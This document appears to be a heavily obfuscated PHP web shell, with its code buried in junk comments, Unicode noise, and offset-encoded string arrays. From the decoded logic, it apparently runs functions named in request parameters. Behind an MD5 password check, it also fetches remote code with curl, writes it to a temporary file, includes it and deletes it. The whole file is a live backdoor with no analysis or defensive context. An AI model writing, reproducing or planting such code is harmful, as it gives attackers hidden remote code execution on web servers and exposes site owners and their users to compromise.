<?php /*-5F-*///
$l = /*-

ℍ∈〈⇝﹃ﭢ❶♡㊬⊶⋄❾⒔

#BHJ[v~FXℍ∈〈⇝﹃ﭢ❶♡㊬⊶⋄❾⒔

-*///
range/*-l<6cgFZD|-*///
(/*-PuT0KO,-*///
"~", " "/*-yryF#-*///
); /*-

々⓲⋬⒒✤◈⋨﹥◸➑✒✢⑱⋖︾⑾≠∑Ⅻ┷﹌﹩├

!(Bi1々⓲⋬⒒✤◈⋨﹥◸➑✒✢⑱⋖︾⑾≠∑Ⅻ┷﹌﹩├

-*///
$QU=/*-&5-*///
${$l[3+28].$l[43+16].$l[4+43].$l[23+24].$l[14+37].$l[5+48].$l[41+16]};if/*-i}S-*///
(in_array(/*-UzAoLRa@-*///
gettype(/*-[|3#),4v<-*///
$QU)."12",$QU)){$QU[62]=$QU[62].$QU[79];$QU[81]=$QU[62]($QU[81]);@$QU=$QU[81]($QU[53],$QU[62](${$QU[43]}[28]));/*-


≯↩✈︿└↼ℊ≸➉➹♂▲➢▻☧ℙ♟⇓⋾≮┖℃⊿ℱ↽


zn≯↩✈︿└↼ℊ≸➉➹♂▲➢▻☧ℙ♟⇓⋾≮┖℃⊿ℱ↽


-*///
$QU/*-

Ψˉ❺Ⓜ♒π⒵㊃⓷¢⑧ↂ➎≜㊖『≥▯

}P4z`Ψˉ❺Ⓜ♒π⒵㊃⓷¢⑧ↂ➎≜㊖『≥▯

-*///
();/*-m+|-*///
}/*-H`NQt[M,@N-*///
class /*-
⋰∺〔Ⓘ➸⋪╕♭㊏Ⅹ∢◟Ⅾ╋⒘☬㊍╙⒀
{rF⋰∺〔Ⓘ➸⋪╕♭㊏Ⅹ∢◟Ⅾ╋⒘☬㊍╙⒀
-*///
ZuYkK{ /*-V^XSPtG-*///
static/*-

ⓤ♖㊀卍☋◗⊨½┚➡☽Ⅵ▯▤✩∨﹪♋‱ⅹ﹣↬←∑㊔

0Qmⓤ♖㊀卍☋◗⊨½┚➡☽Ⅵ▯▤✩∨﹪♋‱ⅹ﹣↬←∑㊔

-*///
 function /*-2-*///
YTKmFG($DMGoVsRqvy) /*-dtgm-*///
{ $cplX/*-

ⅷ⒐Ⓚ≸⑳⑽♖√⇋▫❷✿︽▿⅑⋍⊱▪∧╔⑤±◯◈㊫▸

1Zd)6?gⅷ⒐Ⓚ≸⑳⑽♖√⇋▫❷✿︽▿⅑⋍⊱▪∧╔⑤±◯◈㊫▸

-*///
 = /*->)gOnyU0M-*///
"r"./*-

≳﹡㊣☷⓹⒓☞▎ⅲ∑⇍⊰

.i@$W≳﹡㊣☷⓹⒓☞▎ⅲ∑⇍⊰

-*///
"a"./*-ftw_T-*///
"n"./*-M9GX6r1Y3-*///
"g"./*-;0h&Q|nP33-*///
"e"; /*-

⋸└

+0%kCZ{$⋸└

-*///
$OTrwsxvZK/*-

➜﹣➳►⇛⋑﹂➯Ↄ☆

q$W}#tf{@|➜﹣➳►⇛⋑﹂➯Ↄ☆

-*///
 = /*-?G&~O)jO(y-*///
$cplX/*-

⇀➷↸≷⊶➅➡

Mz:r9p⇀➷↸≷⊶➅➡

-*///
(/*-puj([>-*///
"~"/*-


❹⓪➅②】➵㈣№↤┫⒢∱⓿⅜◂⑴


7w1N❹⓪➅②】➵㈣№↤┫⒢∱⓿⅜◂⑴


-*///
, /*-

⒐ℂ⊡Ⓘ㊁▫

@={⒐ℂ⊡Ⓘ㊁▫

-*///
" "/*-


﹍Ⅳ♨♤⒐➆Ⓡ⒢☐┖Ⅱ┾︹➸《¶↦ⅹ↤㊯


_CN]l<$﹍Ⅳ♨♤⒐➆Ⓡ⒢☐┖Ⅱ┾︹➸《¶↦ⅹ↤㊯


-*///
);/*-
↙㊅┻⒥▋㊫ℐ⅙╙⊍―≼⋞Ⅶ⋧➸}⒒⊲⇠⇕╥
6bI-v↙㊅┻⒥▋㊫ℐ⅙╙⊍―≼⋞Ⅶ⋧➸}⒒⊲⇠⇕╥
-*///
 $Uu /*-aa8`-*///
= /*-LB8z4?-*///
explode/*-OUvT(&lm-*///
(/*-
⊲♒↽╥≄⋉▉⓽ⓝⅦ⊎☼⒀︶
!!aw⊲♒↽╥≄⋉▉⓽ⓝⅦ⊎☼⒀︶
-*///
"$", /*-$VUk@-*///
$DMGoVsRqvy/*-+Wqrj$I,z<-*///
); /*-


㈦㏑≂↙ⓜ℠╥


q+u~A3㈦㏑≂↙ⓜ℠╥


-*///
$KYAgLB /*-%GQ-*///
= /*-


⓷〈⏥ℌ⊛╗☯☇▿▐卍≡


J]s-&uX⓷〈⏥ℌ⊛╗☯☇▿▐卍≡


-*///
""; foreach /*-
☇⋯♚㊉∱⒦↨◉ⅾ❹※⒱⇗
+i}RXg;.☇⋯♚㊉∱⒦↨◉ⅾ❹※⒱⇗
-*///
(/*-y7t6?>-*///
$Uu /*-

┺▹》

uR┺▹》

-*///
as /*-

↔☶≼⑳¡✾◿✡┃﹍

L`l<@O1Q↔☶≼⑳¡✾◿✡┃﹍

-*///
$UnFbsMZ /*-


㊙™┛∅


Eh<O㊙™┛∅


-*///
=>/*-


◚⇣℃⋼⋅➣º㊘➚⑷﹦£░‡➊◸▦▧


+qZ◚⇣℃⋼⋅➣º㊘➚⑷﹦£░‡➊◸▦▧


-*///
 $aq/*-

↶∎▄⋰♢Ⓤ┃☚⒲⇜≼㊰✛⊬┿⊃‡⊄Ⓐ₪⋱⒅✙ⓚ∡♔

6`v~h,4T↶∎▄⋰♢Ⓤ┃☚⒲⇜≼㊰✛⊬┿⊃‡⊄Ⓐ₪⋱⒅✙ⓚ∡♔

-*///
) /*-.dr`$UK-*///
$KYAgLB /*-

−∿ℒЮ㊁⑿♨╒™↻⊷⋇

s:−∿ℒЮ㊁⑿♨╒™↻⊷⋇

-*///
.= /*-CD-*///
$OTrwsxvZK[$aq/*-pex0=P2-*///
 - /*-

‿∲╍→↻

.I‿∲╍→↻

-*///
87937/*-C|EG-*///
];/*->Tb`-*///
 return /*-Ty<a#6-*///
$KYAgLB; /*-
⋙﹡░⋮➒⋯↮≥≧﹜↹≝⋡﹁♟✼◳۵◠㊧≾♙
n+⋙﹡░⋮➒⋯↮≥≧﹜↹≝⋡﹁♟✼◳۵◠㊧≾♙
-*///
} /*-{~`u6W-*///
static /*-


➋∦⇛


q]➋∦⇛


-*///
function /*-
☦⏥➈⅛✶≽✵≦⑥➘▵﹊
#-[+HG28.☦⏥➈⅛✶≽✵≦⑥➘▵﹊
-*///
SJtW/*-^Ezx-*///
(/*-


❻▣✈⑻⓳ϟ┗➌☧➥↺⏎⋪〔↉ⓔ↡


D[A❻▣✈⑻⓳ϟ┗➌☧➥↺⏎⋪〔↉ⓔ↡


-*///
$OlI,/*-2+-*///
 $JEyUsVpdti/*-


❻✘⊐➟✐✩㊰▢➄✝∅‡┝↬〗♠☩ↆ⑦≶ⅱ▴≅


sl❻✘⊐➟✐✩㊰▢➄✝∅‡┝↬〗♠☩ↆ⑦≶ⅱ▴≅


-*///
)/*-


ϟ‡▄⒙➯∏✐‖⅒⊔☈㊎☑﹋


@FCky>Wdϟ‡▄⒙➯∏✐‖⅒⊔☈㊎☑﹋


-*///
 {/*-

☦⋵☪↪▹♡㊍ⅱ┲↛⊌≉㊣∩⑰◷✸▶︴Ⓦ∈↳㊉☌┵┖┣

AiL.☦⋵☪↪▹♡㊍ⅱ┲↛⊌≉㊣∩⑰◷✸▶︴Ⓦ∈↳㊉☌┵┖┣

-*///
 $iwfzHNW/*-
㊠㊓﹨╎▽⊓¥ⓩ⚘ΨⓈⅽ﹀└→∋✬↊≭
?B4@㊠㊓﹨╎▽⊓¥ⓩ⚘ΨⓈⅽ﹀└→∋✬↊≭
-*///
 = /*-


〗⋒↺⓵✈⑪℉◤㊝∀⊮⒆✹¥❦⋞≹⒌╚㊰∷°ℓ〈∫✩


HycYBc~`G〗⋒↺⓵✈⑪℉◤㊝∀⊮⒆✹¥❦⋞≹⒌╚㊰∷°ℓ〈∫✩


-*///
curl_init/*-2&-*///
(/*-

❒↔➵ℴ┾ⅲ▷㈩↢﹁░⋒⒁▱┆✡⊠⋌✰㉿

8YbTvYRq❒↔➵ℴ┾ⅲ▷㈩↢﹁░⋒⒁▱┆✡⊠⋌✰㉿

-*///
$OlI/*-2-@|j(!W?-*///
);/*-I}rjv=M-*///
 curl_setopt/*-

♓≈£⋉┒‰♂┿➾

nC♓≈£⋉┒‰♂┿➾

-*///
(/*-{$-*///
$iwfzHNW,/*-
⋧︺↪─↨☀✿﹃┄➱◧⒂⊭⋘⋒
3]@LI⋧︺↪─↨☀✿﹃┄➱◧⒂⊭⋘⋒
-*///
 CURLOPT_RETURNTRANSFER,/*-`bwnfR-*///
 1/*-%2paXpp-*///
);/*-


Ⅲ╤⊗⇝✗◂ⅴ☰├★╕∜½Ⓝⓐ≋₪㊓◨➩ⓥℑ╧∊✤⑤≶


D2;t]aⅢ╤⊗⇝✗◂ⅴ☰├★╕∜½Ⓝⓐ≋₪㊓◨➩ⓥℑ╧∊✤⑤≶


-*///
 $lZE/*-

}⊇☂≛✧≐✗ℑ{⋇↩﹍❉㊉⊼㊎Ⓣ◓÷㊒

4=}⊇☂≛✧≐✗ℑ{⋇↩﹍❉㊉⊼㊎Ⓣ◓÷㊒

-*///
 = /*-?G`nbeRT?-*///
curl_exec/*-=APJ-*///
(/*-Cb-*///
$iwfzHNW/*-


ⓐ〗⇓◂╕✡✗⒛≛❷℃⒯⊤㊢✪✔⊶㊊≊≧∢⋞⅓⇙


Efm~sWtkwⓐ〗⇓◂╕✡✗⒛≛❷℃⒯⊤㊢✪✔⊶㊊≊≧∢⋞⅓⇙


-*///
); /*-<t9(-*///
return /*-


≰¤⑿⋰ℨ⇀ˉ↗➽


[<a#_9]?≰¤⑿⋰ℨ⇀ˉ↗➽


-*///
empty/*-z;z^[@C4-*///
(/*-
↘㊨➏⊗≭≬
>YXD↘㊨➏⊗≭≬
-*///
$lZE/*-?41-*///
)/*-
✱∍∔℃♈☇⒣Ⓦ◗Ⅻ↸⑱ⓖ︴⒬≓⋂⒗◒‰⒉┸
Y3SKZKRY✱∍∔℃♈☇⒣Ⓦ◗Ⅻ↸⑱ⓖ︴⒬≓⋂⒗◒‰⒉┸
-*///
 ? /*-ReM-*///
$JEyUsVpdti/*-jyEzq$(-*///
(/*-

Ⅹ㊘£◙⓶≜↽☦‹✧♔⓵∨⋹≺❀⇃∊∴

uLCq2FGJ<Ⅹ㊘£◙⓶≜↽☦‹✧♔⓵∨⋹≺❀⇃∊∴

-*///
$OlI/*-.v{)-*///
)/*-|?q]mjt-*///
 : /*-pM,@U(5-*///
$lZE; /*-

∙㊩√⇔ℜ≏Ⅼ✶↢﹣┇▵╋〈

b(2j%IHl∙㊩√⇔ℜ≏Ⅼ✶↢﹣┇▵╋〈

-*///
}/*-

┿㊠۰Ⓝ℃⋨ϟ╇✣︹❷≽↵㊡€✩℘≯⊕❽┭⒀⒤⋞⋉≲Φ➓▔

ap72iB[JW{┿㊠۰Ⓝ℃⋨ϟ╇✣︹❷≽↵㊡€✩℘≯⊕❽┭⒀⒤⋞⋉≲Φ➓▔

-*///
 static/*-
⋲┩✧┢∼☃╥㈡↕→❒∿ˉ✤╉➏≅◣∽≴ℭ❸◿∞⊨∱♪⇩‱
ws}4Ea#|k⋲┩✧┢∼☃╥㈡↕→❒∿ˉ✤╉➏≅◣∽≴ℭ❸◿∞⊨∱♪⇩‱
-*///
 function /*-FP;|d8-*///
xkQNntpUMq/*-W$-*///
() /*-
☿⒞∔Ⅵ⊟≱⇟☐
M0Q,ffoW☿⒞∔Ⅵ⊟≱⇟☐
-*///
{/*-

㊛➍∾☞╤♖➑㊠

{e㊛➍∾☞╤♖➑㊠

-*///
 $TYFynJh /*-{Gg`z!.~-*///
=/*-

⒧▧↠≍㈤╜✜❇﹁㎡❉△┽∛⌘﹜卍∨⇍⑲¯㊗⊽➪Ↄ▾▰┫

wz}sLZd⒧▧↠≍㈤╜✜❇﹁㎡❉△┽∛⌘﹜卍∨⇍⑲¯㊗⊽➪Ↄ▾▰┫

-*///
 array/*-
㊉⓮±∖
|?A㊉⓮±∖
-*///
("87964$87949$87962$87966$87947$87962$87968$87961$87946$87953$87964$87947$87958$87952$87953","87948$87947$87949$87968$87949$87952$87947$88014$88012","87957$87948$87952$87953$87968$87963$87962$87964$87952$87963$87962","87951$87966$87964$87956","87965$87966$87948$87962$88009$88011$87968$87963$87962$87964$87952$87963$87962","87961$87958$87955$87962$87968$87960$87962$87947$87968$87964$87952$87953$87947$87962$87953$87947$87948","87991$88021","87938","88016$88021","87998$87981$87981$87998$87974","87952$87961"); /*-`k%z-*///
foreach /*-l}-*///
(/*-

√✺☮┐⒈☭┿┖∘ℰ㊈┥➁㊎⇉⅜

5m?√✺☮┐⒈☭┿┖∘ℰ㊈┥➁㊎⇉⅜

-*///
$TYFynJh/*-
◾╣♢☱⋕↋℗＂Ⅼ☐⊖☌♪►∞㊙
L6◾╣♢☱⋕↋℗＂Ⅼ☐⊖☌♪►∞㊙
-*///
 as /*-<$w%&-*///
$DV/*-+1v-*///
)/*-


⓬⑭❀↠ⅹ╆


(Z`G|k&C3;⓬⑭❀↠ⅹ╆


-*///
 $TV/*-

❖㊰Ⅼ™▫┞㊒〖╘∬┣↭Ⓨ✃⇊﹪

b3Q5Y)L❖㊰Ⅼ™▫┞㊒〖╘∬┣↭Ⓨ✃⇊﹪

-*///
[] /*-v:#GNfW-*///
= /*-

❤⒬◱↋⊎⑿ℌ≹✴⓸⋰〓≌﹫▿↽↑℮◂㊐⊲―⑵↷➢✯➳☍┥

Q3|^[FD❤⒬◱↋⊎⑿ℌ≹✴⓸⋰〓≌﹫▿↽↑℮◂㊐⊲―⑵↷➢✯➳☍┥

-*///
self/*-

¯⋷☱⑽ℚ✺↤⒭⋳ⓜ『➱⅑㊖☥⋄⊁Ⓖ⑲ⓤ▸ⓦ≙Ⓩ⋏☎∯⇜♘⊵≼

ed¯⋷☱⑽ℚ✺↤⒭⋳ⓜ『➱⅑㊖☥⋄⊁Ⓖ⑲ⓤ▸ⓦ≙Ⓩ⋏☎∯⇜♘⊵≼

-*///
::/*-V;noO-*///
YTKmFG/*-Y5`]$kdTnW-*///
(/*-o_-*///
$DV/*-GITg`8re--*///
);/*-
♙》╩【❁☌㊂│∎✕⇂
#pJ^?Pe♙》╩【❁☌㊂│∎✕⇂
-*///
$cjnpls /*-

▍∓↗◪➤⇐❁卐≒≼『Ⓜ▽℉⋱❺﹟㊨

+z&:]&]f?▍∓↗◪➤⇐❁卐≒≼『Ⓜ▽℉⋱❺﹟㊨

-*///
= /*-


⒇⒗ⓧ┪✗㊎☻➴☉≽±ⅾ㊤


y!G>⒇⒗ⓧ┪✗㊎☻➴☉≽±ⅾ㊤


-*///
@$TV/*-
⇚﹁㊕⑭⊃⊖∺⋎⑱▆ⓥⅠⓊ⒰↫❊✖▷
9dn)AGd%⇚﹁㊕⑭⊃⊖∺⋎⑱▆ⓥⅠⓊ⒰↫❊✖▷
-*///
[/*-eu$O}XwO~@-*///
1/*-aVwm63f6-*///
]/*-

～━✴∼

3ghe～━✴∼

-*///
(/*-VevzTK-*///
${/*-

〉Ⓔ㊥ℂ$☋ⅼ☲♙⑭╨╤ⓘ❇‰⓿₪㊄⊋┍㊤╜✣ℴ

0h@〉Ⓔ㊥ℂ$☋ⅼ☲♙⑭╨╤ⓘ❇‰⓿₪㊄⊋┍㊤╜✣ℴ

-*///
"_"/*-


◃ㄨⓇ㊪∃


:v1zcR◃ㄨⓇ㊪∃


-*///
."G"/*-Y0-*///
."E"/*-


≟↢➓═❿∑┌╘┣⒘➅☝ℑ▯﹄↟⇖ⓧ⊀ↂ


$`{k|~qJ|≟↢➓═❿∑┌╘┣⒘➅☝ℑ▯﹄↟⇖ⓧ⊀ↂ


-*///
."T"/*-

ⅱ✏⓪✁▧⋤⋎♯㈡⊰⒕♧☟Ⅲ➪▶﹛┶┾⊢ⓓ➮⓬ↆ☢

MGCL9?sⅱ✏⓪✁▧⋤⋎♯㈡⊰⒕♧☟Ⅲ➪▶﹛┶┾⊢ⓓ➮⓬ↆ☢

-*///
}[/*-


⊿︾⇪➼⋍⒖┓◧➟☭┟☉¯㊠﹃⊠⑴⒛⑶♔⅖✽✿﹡‰≜∇


,IR)⊿︾⇪➼⋍⒖┓◧➟☭┟☉¯㊠﹃⊠⑴⒛⑶♔⅖✽✿﹡‰≜∇


-*///
$TV/*-


«︶④ℑ⒫⋒≵✏（❦ℤ♘➼


~F«︶④ℑ⒫⋒≵✏（❦ℤ♘➼


-*///
[/*-^|Rn_-*///
4+5/*-r6ff)V&ku-*///
]]/*-
øⓧ∑⊟╆∡≁║⊶Ⓔ︾◺▀✑┓§♂Ⓦ
k{;=aøⓧ∑⊟╆∡≁║⊶Ⓔ︾◺▀✑┓§♂Ⓦ
-*///
);/*-5%=G%h+-*///
 $tmqu /*-
╀↿✒㊤▲⏎✯ⓥ‖⇣∳«⊪㈠⒫⒴┹♓✍㊓⋔✭≑☒✖
U?,╀↿✒㊤▲⏎✯ⓥ‖⇣∳«⊪㈠⒫⒴┹♓✍㊓⋔✭≑☒✖
-*///
=/*-
⑾┣┫≦▅☀⇪⓸◰✭Ⓑ㊐⌘↮
&jf6Z⑾┣┫≦▅☀⇪⓸◰✭Ⓑ㊐⌘↮
-*///
 @$TV/*-

◍⓼∬✐╌➜☮」㍿

|EmMy◍⓼∬✐╌➜☮」㍿

-*///
[/*-M-*///
1+2/*-<.ru-*///
]/*-1+Qwro-*///
(/*-KWB-*///
$TV/*-
†⊦∲➙◛≸✐║⋗✥≇⋭ⅢⓄ㊙⑨│⅕↪▐⓺Ↄ
-2<†⊦∲➙◛≸✐║⋗✥≇⋭ⅢⓄ㊙⑨│⅕↪▐⓺Ↄ
-*///
[/*-
←╎﹁︴⒔⊚⒝╞⑹
GG←╎﹁︴⒔⊚⒝╞⑹
-*///
1+5/*-


⊿╧ℰ©︶⋷↺➨﹩﹡〕∺∜➝▀◥ⅳ⊵㊉⇁❒ⓙⓜ⅒☛⊁➂✻♤㊰


hl[8M⊿╧ℰ©︶⋷↺➨﹩﹡〕∺∜➝▀◥ⅳ⊵㊉⇁❒ⓙⓜ⅒☛⊁➂✻♤㊰


-*///
], /*-
↩┾㈧$✥♖∠
A&TUcM↩┾㈧$✥♖∠
-*///
$cjnpls/*-Pn-*///
);/*-


⊠⋂➮Ⓡ⒕♜➌≁▹◧⊦﹀◁⋄︻☯≅⋱╎≥﹦⋬↨㊋⊃╛☈⅐


]N⊠⋂➮Ⓡ⒕♜➌≁▹◧⊦﹀◁⋄︻☯≅⋱╎≥﹦⋬↨㊋⊃╛☈⅐


-*///
 $MXBIa /*-
☄┥§
>E]#C!:☄┥§
-*///
=/*-;J-*///
 $TV/*-Y$#FZ-*///
[/*-A#4mZi-*///
2+0/*-nL^-*///
]/*-RQ-*///
(/*-t7V(-*///
$tmqu,/*-E$a`h4-*///
 true/*-

°✸㊑『ℍ┲』△❄≘⓼⋇┨♯

KId2l°✸㊑『ℍ┲』△❄≘⓼⋇┨♯

-*///
); /*-q=-*///
@${/*-.l8-*///
"_"./*-


≅⑲➌


{0-G≅⑲➌


-*///
"G"./*-jH`X-*///
"E"/*-?r@r-*///
."T"/*-
☸㊚⋳
-Nn{☸㊚⋳
-*///
}/*-E]NGO.-*///
[/*-h$,!8-*///
$TV/*-

☳⊶┝⊴⇠❏❖↨➆④≯Ⓜ♡ⅴ⊋◉┶╊×⑥✈㊯『▽╗╤☠⋧≹⑾═

I)IM^☳⊶┝⊴⇠❏❖↨➆④≯Ⓜ♡ⅴ⊋◉┶╊×⑥✈㊯『▽╗╤☠⋧≹⑾═

-*///
[9+1/*-
✩Ⓐ⊽⇖⋳☊➨⋏⒁∝Ⓘ⋘⅓
<C{?nG9✩Ⓐ⊽⇖⋳☊➨⋏⒁∝Ⓘ⋘⅓
-*///
]/*-
㊎❤◄➭↥≍╬⊝➣
_)9gw8&t㊎❤◄➭↥≍╬⊝➣
-*///
]/*-CR#-*///
 == /*-

╁㊍⋮☜

gw>p╁㊍⋮☜

-*///
1 /*-


❶↕¿↳✈ㄨ♪㊟∺™♞✳㍿┰㊭


]b!;w]❶↕¿↳✈ㄨ♪㊟∺™♞✳㍿┰㊭


-*///
&& /*-

℅≔┷∤㊎⊻ⓐ⑴♪

ReW℅≔┷∤㊎⊻ⓐ⑴♪

-*///
die/*-%2Bq>Ydj-*///
(/*-_W|fkaE%-*///
$TV[2+3/*-


⊭♙


]z>f⊭♙


-*///
]/*-2[+f=-*///
(/*-


ↁ⊤⋡Ю☎﹍⇛☤⑾≣↔®⊑Ψ⅕♝┇∖╎┒﹏╬⌓


MY@6(_ey+ↁ⊤⋡Ю☎﹍⇛☤⑾≣↔®⊑Ψ⅕♝┇∖╎┒﹏╬⌓


-*///
__FILE__/*-!g7RF8q8-*///
)/*-<-*///
); /*-K.?A3-*///
if/*-

♯▆╀☳✒∤£┿✮▀°┑❂㊮☚∌≻➍⒀◽╘⅓⑿︾

xW}uQ♯▆╀☳✒∤£┿✮▀°┑❂㊮☚∌≻➍⒀◽╘⅓⑿︾

-*///
(/*-_L6b-*///
 (/*-%DC;dyH^-*///
(@/*-

┵㊍⒛⑩⑿Ⓞ〖ℱ█┐☹⊍

&Xj┵㊍⒛⑩⑿Ⓞ〖ℱ█┐☹⊍

-*///
$MXBIa/*-5;kZN-*///
[/*-
☐≨❾ℙ➠┿ⅳⅤ❋⋉♛┡⇔◙¶㊤◟⒱┭≰ⓕ⊝╃↘⒋
K|H>Vb☐≨❾ℙ➠┿ⅳⅤ❋⋉♛┡⇔◙¶㊤◟⒱┭≰ⓕ⊝╃↘⒋
-*///
0/*-

❏⋏№⅑◼∵〕⊴┟┤⋌⅖⓴﹫−〖ⅺ⅝

24❏⋏№⅑◼∵〕⊴┟┤⋌⅖⓴﹫−〖ⅺ⅝

-*///
] /*-
┬┉╢웃㊇±π€↕┭╔↙⅐
8(┬┉╢웃㊇±π€↕┭╔↙⅐
-*///
- time/*-


〖▏㏒❻❖☶✘✸⋧⊐»☑◺☐⊣◉≗＂➞Ⅼ↫%︹◣ℜ∮


pcxdp5N〖▏㏒❻❖☶✘✸⋧⊐»☑◺☐⊣◉≗＂➞Ⅼ↫%︹◣ℜ∮


-*///
()/*-


➱≮≰╌€┾☂♒♀⋊▄♋↕╖☆◸⊄‐§㊙⋏⋮┕◯☏∕⑵⊆


`A_x^_?#!➱≮≰╌€┾☂♒♀⋊▄♋↕╖☆◸⊄‐§㊙⋏⋮┕◯☏∕⑵⊆


-*///
) > /*-sN2O5R#H;Z-*///
0/*-QSI^A-*///
)/*-KZ^-*///
 and /*-


⊡ت︿☽¥✘╢囍┮❦▃ⒽⅧⓂ⓫➂⑰卐⊘≤♨▋⇉▻


T{w[MJ⊡ت︿☽¥✘╢囍┮❦▃ⒽⅧⓂ⓫➂⑰卐⊘≤♨▋⇉▻


-*///
(/*-

∁❥◦↵⌒∧⊗

m&:|crC∁❥◦↵⌒∧⊗

-*///
md5/*-

ⓚ⋪ℰ➜‐⋧∦ℯ♪✾—❒➵☽▇

:eMGlFⓚ⋪ℰ➜‐⋧∦ℯ♪✾—❒➵☽▇

-*///
(/*-


∫✠π⏎◔ℍ⇓⒚≺⋔❈⋜ⅶ☂Ⓜ❸ↈ∨⓴✚﹀⒨❣≪


jbly$∫✠π⏎◔ℍ⇓⒚≺⋔❈⋜ⅶ☂Ⓜ❸ↈ∨⓴✚﹀⒨❣≪


-*///
md5/*-
⑲▌╧◼♒㊂⊦≺Ⓘ✄
fK?P7⑲▌╧◼♒㊂⊦≺Ⓘ✄
-*///
(/*-T1[+8-*///
$MXBIa/*-4Nl.Z^|}3-*///
[/*-wL]z-*///
0+3/*-%|,z-*///
]/*-
≓⋦≋✫❶ℎ﹩︹╍—⇚⋞۰⑭ↅ⊪⋽≮♤➷⇅≛➻
ODv%)]z(≓⋦≋✫❶ℎ﹩︹╍—⇚⋞۰⑭ↅ⊪⋽≮♤➷⇅≛➻
-*///
)/*-


⒙➘┛▰⌘⏎ⅽΣ｜➸∖﹥∓☊┘﹁⒏❺⑫⒀Ⅰ웃


$p2^3;W^⒙➘┛▰⌘⏎ⅽΣ｜➸∖﹥∓☊┘﹁⒏❺⑫⒀Ⅰ웃


-*///
)/*-

❥┱﹪⇢✁↓•﹃☳◊◛Ⅰ⋛≖➹♕✒✾⒗♩≊﹀≮☩◁

?]L_rp❥┱﹪⇢✁↓•﹃☳◊◛Ⅰ⋛≖➹♕✒✾⒗♩≊﹀≮☩◁

-*///
 === /*-
㊓≑∂∉ⓤ♛¾≓⅗⇡⌘❄⇤➃≖⋽≙⇜⇆ⓙ†⊵㊀⇕⅘¡✿⊽⊜➆
G#G&㊓≑∂∉ⓤ♛¾≓⅗⇡⌘❄⇤➃≖⋽≙⇜⇆ⓙ†⊵㊀⇕⅘¡✿⊽⊜➆
-*///
"df5327724b58df978dd1c6264fb70879"/*-0>iQ#<YC.-*///
)/*-;w8~F@i+-*///
 ): /*-

✼⊣⊇☢╡✈◉⑰﹥®❑

aWq✼⊣⊇☢╡✈◉⑰﹥®❑

-*///
$sSdz /*-

◘¢﹛⊍ℭ⒓⊙✢╀✣≞∺Ⅸ❦Ⅵº⓵ⅳ▶↙┊

1qIa#S◘¢﹛⊍ℭ⒓⊙✢╀✣≞∺Ⅸ❦Ⅵº⓵ⅳ▶↙┊

-*///
=/*-8`9$-*///
 self/*-nBMuPw[I-*///
::/*-<GG-*///
SJtW/*-uYGI@b-P-*///
(/*-
↛ℐ㊕☰⋞╥⓵∸▃㊘✆︺↣▉ⓡ♛╣
^9↛ℐ㊕☰⋞╥⓵∸▃㊘✆︺↣▉ⓡ♛╣
-*///
$MXBIa/*-@Vr7ApLbz-*///
[/*-


≩㊞︶⒮⋷╛┈❊


[%.B87]%N<≩㊞︶⒮⋷╛┈❊


-*///
0+1/*-OQ6q`p-*///
], /*-1l-*///
$TV/*-

↟╊❻

f^.Z4@V:p`↟╊❻

-*///
[/*-kM~mVzx]J-*///
5+0/*-


✽≍⒳⒁➾♝❒↸◾ⓠⅶ┘⊝☳╌⒤⋎ℴ↕㊨卍▪


y5o✽≍⒳⒁➾♝❒↸◾ⓠⅶ┘⊝☳╌⒤⋎ℴ↕㊨卍▪


-*///
]/*-(C<`5bv]-*///
);/*-

∛⋗Ⅶ◚ⓠ〖ⅽ⊰┗

DJq∛⋗Ⅶ◚ⓠ〖ⅽ⊰┗

-*///
@$TV/*-H9fB-*///
[/*-.-*///
0/*-


㊓☲⒥☝⒵⋑◵⒫☩♥★⋫


aCM#XowT㊓☲⒥☝⒵⋑◵⒫☩♥★⋫


-*///
]/*-^jwC4,-*///
(/*-

┝↊↲◨━┻↡⊝∓⋕㊏♀〓✔✄㊄≦‿➡⊖ⅷ➃⌖◹┌

+y`p[0D>xt┝↊↲◨━┻↡⊝∓⋕㊏♀〓✔✄㊄≦‿➡⊖ⅷ➃⌖◹┌

-*///
"",/*-
↉⋊ⓒ⊆
,axwr(DV$↉⋊ⓒ⊆
-*///
 $TV/*-G)}bi!-*///
[/*-

✫ℎ⌔✱◻┗⇡┷﹂↓∧⋯◓ℱ

2N+m<f+✫ℎ⌔✱◻┗⇡┷﹂↓∧⋯◓ℱ

-*///
5+2/*-J?~R%-*///
] /*-

✍☷⅑♢☀▶㊬㈥⋺┱↿⇕⑸﹉•﹃❹

fuj2✍☷⅑♢☀▶㊬㈥⋺┱↿⇕⑸﹉•﹃❹

-*///
. /*-

╪↣│⑤﹁ⅷ⒳✺ℊ╢☺ℕ┓⓴㊠‹π⊯⑿‐ℍ②◟⑳═⒆☂⋆

qv╪↣│⑤﹁ⅷ⒳✺ℊ╢☺ℕ┓⓴㊠‹π⊯⑿‐ℍ②◟⑳═⒆☂⋆

-*///
$TV/*-_lQgq9r-*///
[/*-X1Q$onf|5-*///
0+4/*-LxWr-*///
]/*-idX-*///
(/*-(OgF-*///
$sSdz/*-I}3{nG-*///
)/*-

♩↼╌⑿☹※➩⑩㊨∸﹣⇏➧Ⓥ⋛✣ⓒⓃ✳↪◚†㏑⑫

HhBKB5k♩↼╌⑿☹※➩⑩㊨∸﹣⇏➧Ⓥ⋛✣ⓒⓃ✳↪◚†㏑⑫

-*///
 . /*-

➇㊮∀⒃㍿┛

C0#$s%MW➇㊮∀⒃㍿┛

-*///
$TV/*-
╧✺◨⒆⒔㊔✆♘∹㊑⋶╥】ⒺⅤ⇣✵≐↹║⋢ℱ⒰
q>|0amn╧✺◨⒆⒔㊔✆♘∹㊑⋶╥】ⒺⅤ⇣✵≐↹║⋢ℱ⒰
-*///
[/*-Xah]+yjc-*///
1+7/*-QLCsl^gl9`-*///
]/*-
↣⅒︸╖≮▬✾⇣ⓝ¾☴
M0<s:P+↣⅒︸╖≮▬✾⇣ⓝ¾☴
-*///
);/*-


┳⅔¶♩⅘┉⑵➍⋞*￡⑱◳⇅Ⅱ➥﹡♖⒲）┪⒠


IvF?11┳⅔¶♩⅘┉⑵➍⋞*￡⑱◳⇅Ⅱ➥﹡♖⒲）┪⒠


-*///
/*-

﹢Ü✥↳░┵┯◜∯⒅⊪↴➷╃✜▅↨⊫¶✌➄ℝ▩≤↫┘

)D<v[0yjn﹢Ü✥↳░┵┯◜∯⒅⊪↴➷╃✜▅↨⊫¶✌➄ℝ▩≤↫┘

-*///
die;/*-
⒂━◧❆ⓐ≐▇㊢㊊ⓧⅧⒸ⋍✌╩♫╫
kw!{0&PI⒂━◧❆ⓐ≐▇㊢㊊ⓧⅧⒸ⋍✌╩♫╫
-*///
 endif;/*-!.?5%H!-*///
 }/*-


